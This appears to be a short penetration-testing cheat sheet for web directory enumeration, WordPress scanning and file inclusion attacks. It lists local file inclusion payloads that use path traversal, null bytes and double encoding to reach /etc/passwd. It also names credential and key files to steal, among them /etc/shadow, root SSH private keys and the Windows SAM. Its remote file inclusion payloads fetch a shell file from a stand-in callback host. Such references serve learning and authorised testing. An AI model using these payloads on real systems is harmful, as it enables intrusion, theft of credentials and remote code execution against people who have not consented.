Common Wordlists to use for Web Directory Scanning:
- /usr/share/wordlists/dirb/common.txt
- /usr/share/wordlists/dirbuster/*.txt
- /usr/share/wordlists/wfuzz/general/*.txt
- /usr/share/seclists/Discovery/Web-Content/
- Assetnote Wordlists: https://wordlists.assetnote.io/
- Jhaddix Content Discovery: https://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10
Common Wordlists to use for User Enumeration Scanning:
- /usr/share/seclists/Usernames
- /usr/share/wordlists/dirbuster/apache-user-enum-2.0
Wpscan(WordPress Scannner):
- wpscan --url
- wpscan --url --enumerate ap at (All Plugins, All Themes)
- wpscan --url --enumerate u (Usernames)
- wpscan --url --enumerate v
Other Tools:
- Burp Suite
- OWASP Zap
- Cadaver
- SQLMap
- Joomscan
- Feroxbuster
Examples:
http://example.com/index.php?page=etc/passwd http://example.com/index.php?page=etc/passwd%00 http://example.com/index.php?page=../../etc/passwd http://example.com/index.php?page=%252e%252e%252f http://example.com/index.php?page=....//....//etc/passwd
Interesting Files:
Linux:
/etc/passwd
/etc/shadow
/etc/issue
/etc/group
/etc/hostname
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
/home/user/.ssh/authorized_keys
/home/user/.ssh/id_rsa
Windows:
/boot.ini
/autoexec.bat
/windows/system32/drivers/etc/hosts
/windows/repair/SAM
http://example.com/index.php?page=http://callback.com/shell.txt http://example.com/index.php?page=http://callback.com/shell.txt%00 http://example.com/index.php?page=http:%252f%252fcallback.com%252fshell.txt
- Turning LFI to RFI: https://l.avala.mp/?p=241 Backup: https://web.archive.org/web/20210612222732/https://l.avala.mp/?p=241